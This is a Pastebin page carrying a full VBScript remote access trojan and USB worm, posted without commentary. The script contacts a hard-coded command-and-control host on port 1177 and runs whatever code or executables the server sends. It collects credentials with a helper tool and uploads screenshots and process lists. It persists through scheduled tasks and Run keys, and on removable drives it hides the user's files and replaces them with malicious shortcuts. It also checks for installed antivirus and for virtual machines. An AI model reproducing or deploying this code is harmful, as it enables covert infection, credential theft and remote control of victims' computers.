API tools faq
paste
FingerLickingGood

Untitled

FingerLickingGood
Jul 15th, 2018
143
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.59 KB | None | 0 0
raw download clone embed print report
  1. On Error Resume Next
  2. WScript.Timeout=0
  3. dim Wsh
  4. set Wsh =WScript.CreateObject("WScript.Shell")
  5. dim fs
  6. set fs= CreateObject("Scripting.FileSystemObject")
  7. dim w
  8. Set w = CreateObject("Microsoft.XMLHTTP")
  9. dim dotnet
  10. dotnet="No"
  11. if fs.fileexists(Wsh.ExpandEnvironmentStrings("%windir%") & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe") then
  12. dotnet="Yes"
  13. end if
  14.  
  15. dim host
  16. host= "svchost.gotdns.ch"
  17. Dim port
  18. port=1177
  19. Dim DR
  20. DR = Wsh.ExpandEnvironmentStrings("%TEMP%") & "\"
  21. dim FN
  22. FN ="hkcmd.exe.vbs"
  23. dim fh
  24. dim fi
  25. dim us
  26. lnfe = False
  27. lnfo = False
  28. us="~"
  29. ins
  30. dim spl
  31. spl="Sailor"
  32. dim i
  33. i=0
  34. while true
  35. On Error Resume Next
  36. dim a
  37. WRT "readystate=" & w.readyState
  38. if w.readystate=4 Then
  39. WRT "reading >> responseText"
  40. a= split(w.responseText,spl)
  41. if ubound(a)<>-1 Then
  42. select case a(0)
  43. case "exc"
  44. dim sa
  45. sa= Replace( Replace( a(1),"post ","post "),"uns ","uns ")
  46. execute sa
  47. case "uns"
  48. uns ""
  49. case "sc"
  50. RcFile(a(1))
  51.  
  52. case "De"
  53. RcFile(a(1))
  54. if fs.fileexists( DR & "\De.exe") then
  55. Wsh.run DR & "\De.exe"
  56. end if
  57.  
  58. case "ps"
  59. if fs.fileexists( DR & "\pc.exe") then
  60. CreateObject("WScript.Shell").Run "cmd.exe /k start %temp%\pc.exe /stext tt.dat &&exit" ,0,false
  61. end if
  62.  
  63. post "?ps",ReadTextFile(CharSet)
  64.  
  65. case "pl"
  66. post "?pl",PLIST
  67. case "sr"
  68. if fs.fileexists( DR & "\sc.exe") then
  69. Wsh.run DR & "\sc.exe"
  70. end if
  71. WScript.Sleep 100
  72. post "?pp",getsfile
  73.  
  74.  
  75. case "pr"
  76. RcFile(a(1))
  77.  
  78. case "kl"
  79. klprocess (a(1))
  80. post "?kled",""
  81. end select
  82. Else
  83. end If
  84. WRT "do until w.readystate=4"
  85. do until w.readystate=4
  86. wscript.sleep(1000) '''''''''''''''''''''''''''''''
  87. if x.status =0 or x.status= 200 then
  88. else
  89. exit do
  90. end if
  91. loop
  92. post "?mew", ActiveWindow
  93. end if
  94. wscript.sleep 1000
  95. i = i + 1
  96. if i= 2 or i =4 or i =6 then
  97. xins
  98. end if
  99. if i>=7 then
  100. i=0
  101. if w.readystate<>4 Then
  102. WRT "readystate<>4 Aborting.."
  103. On Error Resume Next
  104. w.abort
  105. post "?mew",""
  106. end if
  107. end if
  108. wend
  109.  
  110. function vmcheck()
  111. On Error Resume Next
  112. Set WMI = GetObject("WinMgmts:")
  113. Set Col = WMI.ExecQuery("Select * from Win32_ComputerSystemProduct")
  114. For Each Ob in Col
  115. if instr( lcase( ob.name),"virtual") >0 then
  116. On Error Resume Next
  117. fs.deletefile(wscript.scriptfullname)
  118. do
  119. wscript.sleep(1000)
  120. loop
  121. end if
  122. next
  123. end Function
  124. function ins
  125. on error resume Next
  126. us= Wsh.regread("HKEY_CURRENT_USER\" & fn)
  127. if us="~" then
  128. if lcase( mid(wscript.scriptfullname,2))=":\" & lcase(fn) then
  129. us="TRUE"
  130. Wsh.regwrite "HKEY_CURRENT_USER\" & fn, us, "REG_SZ"
  131. else
  132. us="FALSE"
  133. Wsh.regwrite "HKEY_CURRENT_USER\" & fn, us, "REG_SZ"
  134. end if
  135. end if
  136. Err.Clear
  137. dim drr
  138.  
  139. WScript.Sleep 5000
  140. set fh = fs.OpenTextFile( dr & fn, 8, false)
  141. fs.CopyFile wscript.scriptfullname,dr & fn ,true
  142. 'fs.CopyFile wscript.scriptfullname, CreateObject("Wshell.Application").NameSpace(&H7).Self.Path & "\" & fn, True
  143. set fi = fs.OpenTextFile( dr & fn, 8, false)
  144.  
  145.  
  146. xins
  147.  
  148. end Function
  149. sub xins '''''''''''''''''''''''''''''''''regwrite
  150. On error resume Next
  151.  
  152. If Wsh.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & fn)<> "%windir%\system32\wscript.exe /b " & chrw(34) & dr & fn & chrw(34) then
  153. 'Wsh.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & fn, "%windir%\system32\wscript.exe /b " & chrw(34) & dr & fn & chrw(34), "REG_SZ"
  154. End if
  155. If Wsh.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & fn)<>"%windir%\system32\wscript.exe /b " & chrw(34) & dr & fn & chrw(34) then
  156. 'Wsh.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & fn,"%windir%\system32\wscript.exe /b " & chrw(34) & dr & fn & chrw(34), "REG_SZ"
  157. End if
  158. If Wsh.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden")="1" Then
  159. 'Wsh.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",0,"REG_DWORD"
  160. End If
  161. for each xx in fs.Drives
  162.  
  163.  
  164. if xx.isready then
  165. if xx.FreeSpace >0 then
  166. if xx.drivetype=1 then
  167.  
  168. if fs.fileexists(xx.path & "\" & fn & ".vbs") then
  169. fs.getfile(xx.path & "\" & fn & ".vbs").Attributes=0
  170. end if
  171. fs.copyfile dr & fn & ".vbs" , xx.path & "\" & fn & ".vbs",true
  172.  
  173.  
  174. dim mx
  175. mx=0
  176. for Each x In fs.GetFolder( xx.path & "\" ).Files
  177.  
  178. if mx=20 then
  179. exit for
  180. end if
  181. wscript.sleep 1
  182. if not lnfe then exit for
  183. if instr(x.name,".") Then
  184. if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" Then
  185. x.Attributes = 2
  186. if ucase(x.name) <> ucase(fn & ".vbs") Then
  187. mx =mx +1
  188. With Wsh.CreateShortcut(xx.path & "\" & x.name & ".lnk")
  189. .TargetPath = "%SystemRoot%\system32\cmd.exe"
  190. .WorkingDirectory = ""
  191. .WindowStyle=7
  192. .Arguments = "/c start " & Replace(fn," ", ChrW(34) _
  193. & " " & ChrW(34)) & "&start " & replace( x.name," ", ChrW(34) & " " & ChrW(34)) & " & exit"
  194. .IconLocation = Wsh.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\" & sh.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\." & Split(x.name, ".")(UBound(Split(x.name, "."))) & "\") & "\DefaultIcon\")
  195. if instr( .iconlocation,",")=0 then
  196. .iconlocation = .iconlocation &",0"
  197. end if
  198. .Save()
  199. end with
  200. end if
  201. end if
  202. end if
  203. Next
  204. mx=0
  205. fs.CreateFolder(xx.path & "\! Videos\" )
  206. for Each x In fs.GetFolder( xx.path & "\" ).SubFolders
  207. if not lnfo then exit for
  208. if mx=20 then
  209. exit for
  210. end if
  211. wscript.sleep 1
  212. x.Attributes = 2
  213. mx =mx +1
  214. With Wsh.CreateShortcut(xx.path & "\" & x.name & ".lnk")
  215. .TargetPath = "%SystemRoot%\system32\cmd.exe"
  216. .WorkingDirectory = ""
  217. .WindowStyle=7
  218. .Arguments = "/c start " & Replace(fn," ", ChrW(34)& " " & ChrW(34)) & "&start explorer /root,%CD%" & replace( x.name," ", ChrW(34) & " " & ChrW(34)) & "& exit"
  219. .IconLocation = "%windir%\system32\SHELL32.dll,3"
  220. .Save()
  221. end with
  222. Next
  223. end if
  224. end if
  225. end if
  226. next
  227. Err.Clear
  228. end sub
  229. Sub WRT(s)
  230. On Error Resume Next
  231. WScript.Stdout.WriteLine s
  232. End Sub
  233.  
  234. function uns(ex)
  235. on error resume Next
  236.  
  237. WRT "uns"
  238. fi.close
  239. fh.close
  240. Wsh.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & FN
  241. Wsh.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & FN
  242. fs.DeleteFile dr & fn ,true
  243. fs.DeleteFile CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & FN ,True
  244. Wsh.Run "cmd.exe /k SCHTASKS /delete /TN feed /f &&exit", 0, false
  245. fs.DeleteFile dr & fn ,true
  246. fs.DeleteFile DR &"sc.exe"
  247. fs.DeleteFile DR &"s.jpg"
  248. fs.DeleteFile DR &"pc.exe"
  249. fs.DeleteFile DR &"tt.dat"
  250. fs.DeleteFile "C:\Windows\Temp\sys.vbs"
  251. for each xx in fs.Drives
  252. if xx.isready then
  253. if xx.FreeSpace >0 then
  254. For Each x In fs.GetFolder( xx.path & "\").Files
  255. if instr(x.name,".") then
  256. if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" then
  257. x.Attributes = 0
  258. if ucase(x.name) <> ucase(fn) then
  259. fs.deletefile(xx.path & "\" & x.name & ".lnk" )
  260. else
  261. fs.deletefile( xx.path & "\" & x.name )
  262. end if
  263. end if
  264. end If
  265.  
  266. Next
  267. For Each x In fs.GetFolder( xx.path & "\").SubFolders
  268. On Error Resume Next
  269.  
  270. if fs.fileexists( xx.Path & "\" & x.Name &".lnk") then
  271. fs.deletefile(xx.path & "\" & x.name & ".lnk" )
  272. end if
  273. x.Attributes = 0
  274. Next
  275. end if
  276. end if
  277. Next
  278. post "?uns",""
  279. Dim tout
  280. tout=0
  281. Do until w.readystate=4
  282. WRT "loop until readystate=4 Now=" & w.readystate
  283. wscript.sleep(1000)
  284. tout =tout + 1
  285. If tout=10 Then Exit do
  286. Loop
  287. WRT "BYE //ex=" & ex
  288. if ex<>"" then
  289. Wsh.Run "cmd.exe /c ping 0&start " & ex,0, false
  290. end if
  291. wscript.quit
  292. end function
  293. Function state
  294. return w.readyState
  295. End Function
  296. function post(cmd ,da)
  297. On Error Resume Next
  298. 'WRT "POST: " & cmd & " da=" & da
  299. w.open "POST","http://" & host & ":" & port &"/" & cmd, true
  300.  
  301. w.setRequestHeader "User-Agent:", inf
  302. w.setRequestHeader "Connection:","Keep-Alive"
  303. w.send da
  304. end function
  305. dim xinf
  306. function imi
  307.  
  308. fs.CopyFile wscript.scriptfullname,"C:\Windows\Temp\sys.vbs",true
  309. Wsh.Run "cmd.exe /k SCHTASKS /Create /sc minute /mo 50 /TN feed /TR C:\WINDOWS\Temp\sys.vbs /RU SYSTEM &&exit", 0, false 'xp
  310. Wsh.Run "cmd.exe /k SCHTASKS /Create /sc minute /mo 50 /TN feed /TR C:\WINDOWS\Temp\sys.vbs &&exit", 0, false ' 7 8 8.1 10
  311. end function
  312. function inf
  313. on error resume Next
  314. if xinf="" then
  315. dim s
  316. s="??"
  317. s = hwd
  318. inf = inf & s & "\"
  319. s="??"
  320. s= Wsh.ExpandEnvironmentStrings("%COMPUTERNAME%")
  321. inf = inf & s & "\"
  322. s="??"
  323. s= Wsh.ExpandEnvironmentStrings("%USERNAME%")
  324. inf = inf & s & "\"
  325. s="??"
  326. Set a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
  327. Set aa = a.ExecQuery ("Select * from Win32_OperatingSystem")
  328. dim co
  329. For Each aaa in aa
  330. s= aaa.Caption & " SP" & aaa.ServicePackMajorVersion
  331. co= aaa.countrycode
  332. exit for
  333. Next
  334. s= replace(s,"Microsoft","")
  335. s= replace(s,"Windows ","Win")
  336. s= Replace(s," Win","Win")
  337. inf = inf & s & "\\" & security &"\4.0\" & us &"\" & dotnet &"\" & pid & spl
  338. xinf=inf
  339. else
  340. inf=xinf
  341. end if
  342. end function
  343. function HWD
  344. HWD="new_??"
  345. On Error Resume Next
  346. Set a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
  347. Set aa = a.ExecQuery("SELECT * FROM Win32_LogicalDisk")
  348. For Each aaa In aa
  349. if aaa.VolumeSerialNumber<>"" then
  350. HWD= "new_" & aaa.VolumeSerialNumber
  351. exit for
  352. end if
  353. Next
  354. end Function
  355. Function ActiveWindow
  356. ActiveWindow=""
  357.  
  358. End Function
  359. function security
  360. on error resume next
  361.  
  362. security = ""
  363.  
  364. set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  365. set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
  366. for each objitem in colitems
  367. versionstr = split (objitem.version,".")
  368. next
  369. versionstr = split (colitems.version,".")
  370. osversion = versionstr (0) & "."
  371. for x = 1 to ubound (versionstr)
  372. osversion = osversion & versionstr (i)
  373. next
  374. osversion = eval (osversion)
  375. if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
  376.  
  377. set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
  378. Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
  379.  
  380. for each objantivirus in colantivirus
  381. security = security & objantivirus.displayname & " ."
  382. next
  383. if security = "" then security = "nan-av"
  384. end function
  385.  
  386. Function getsfile
  387. Set inputStream = CreateObject("ADODB.Stream")
  388. inputStream.Open()
  389. inputStream.Type = 1 ' adTypeBinary
  390. inputStream.LoadFromFile DR & "s.jpg"
  391. Dim dom: Set dom = CreateObject("Microsoft.XMLDOM")
  392. Dim elem: Set elem = dom.createElement("Base64Data")
  393. elem.dataType = "bin.base64"
  394. elem.nodeTypedValue = inputStream.Read
  395. B = elem.text
  396. getsfile = B
  397. End Function
  398. Function ReadTextFile(CharSet)
  399. Const adTypeText = 2
  400. Dim BinaryStream
  401. Set BinaryStream = CreateObject("ADODB.Stream")
  402. BinaryStream.Type = adTypeText
  403. If Len(CharSet) > 0 Then
  404. BinaryStream.CharSet = CharSet
  405. End If
  406. If fs.FileExists(dr & "\tt.dat") then
  407. BinaryStream.Open
  408. BinaryStream.LoadFromFile dr & "\tt.dat"
  409. ReadTextFile = BinaryStream.ReadText
  410. elseif fs.FileExists("C:\WINDOWS\Temp\tt.dat") then
  411. BinaryStream.Open
  412. BinaryStream.LoadFromFile "C:\WINDOWS\Temp\tt.dat"
  413. ReadTextFile = BinaryStream.ReadText
  414. elseif fs.FileExists(Wsh.currentdirectory & "\tt.dat") then
  415. BinaryStream.Open
  416. BinaryStream.LoadFromFile Wsh.currentdirectory & "\tt.dat"
  417. ReadTextFile = BinaryStream.ReadText
  418.  
  419. end if
  420. End Function
  421. Function RcFile(B)
  422. On Error Resume Next
  423. Set objXML = CreateObject("MSXml2.DOMDocument")
  424. Set objDocElem = objXML.createElement("Base64Data")
  425. set bj = createobject ("scripting.filesystemobject")
  426. objDocElem.dataType = "bin.base64"
  427. objDocElem.Text = B
  428. Set objStream = CreateObject("ADODB.Stream")
  429. objStream.Type = 1
  430. objStream.Open
  431. objStream.Write objDocElem.nodeTypedValue
  432.  
  433. If InStr(w.responseText, "sc") = 1 Then
  434. objStream.SaveToFile DR & "\sc.exe", 2
  435. Elseif InStr(w.responseText, "pr") = 1 then
  436. objStream.SaveToFile DR & "\pc.exe", 2
  437. Elseif InStr(w.responseText, "De") = 1 then
  438. objStream.SaveToFile DR & "\De.exe", 2
  439.  
  440. End If
  441.  
  442. End Function
  443. sub klprocess (pid)
  444. on error resume next
  445. Wsh.run "taskkill /F /T /PID " & pid,7,true
  446. end sub
  447.  
  448.  
  449.  
  450.  
  451.  
  452. Function PLIST
  453. Dim PL
  454.  
  455. PL=""
  456.  
  457. With GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\root\cimv2")
  458.  
  459. For Each pro in .ExecQuery("Select * from Win32_Process")
  460.  
  461. PL=PL & Pro.name & ";!" & pro.processid &";!" & pro.ExecutablePath & "|"
  462.  
  463. Next
  464.  
  465. End With
  466.  
  467. PLIST=PL
  468.  
  469. End Function
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!